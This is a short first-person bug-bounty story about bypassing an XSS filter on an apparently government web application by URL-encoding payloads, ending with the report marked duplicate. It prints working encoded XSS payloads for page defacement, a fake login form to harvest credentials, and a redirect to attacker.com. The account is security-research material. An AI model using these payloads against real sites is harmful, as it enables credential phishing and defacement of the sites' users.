While testing a government web application, I tried the usual XSS payloads in the main domain. Nothing worked. Every obvious attempt was blocked, filtered, or simply ignored.

It felt like a dead end.

But in security testing, "nothing works" is often just the beginning.

Like any tester, I started with the basics:

<script>alert(1)</script>

The application handled it well. No execution, no reflection, nothing suspicious.

But there was something about the behavior that didn't feel complete. The filtering seemed too specific, too focused on obvious patterns.

Instead of asking "why is this blocked?", I asked a better question:

What is the filter not seeing?

I stopped sending payloads as plain text.

Instead, I encoded them.

%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

Then passed it into the application:

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

No rejection. No filtering.

Just a normal response.

And then it happened.

The browser decoded the payload.

The application reflected it.

And the JavaScript executed.

No complex exploit. No advanced bypass.

Just encoding.

Once execution is possible, the impact quickly expands.

DOM Manipulation

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3Ddocument.body.innerHTML%3D'Hacked'%3E
None

Phishing Attacks

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3D%22document.body.innerHTML%3D'%3Ch2%3ESession%20Expired%3C/h2%3E%3Cinput%20placeholder%3DUsername%3E%3Cinput%20type%3Dpassword%3E%3Cbutton%3ELogin%3C/button%3E'%22%3E
None

Open Redirect

https://test.com/search?q=%3Cimg%20src%3Dx%20onerror%3D%22location%3D'https://attacker.com'%22%3E

After confirming the vulnerability, I submitted the report with full confidence.

Everything was there:

  • Clean explanation
  • Working payload
  • Solid impact

I was already imagining the "Valid" status.

But guess what

Marked as duplicate.

None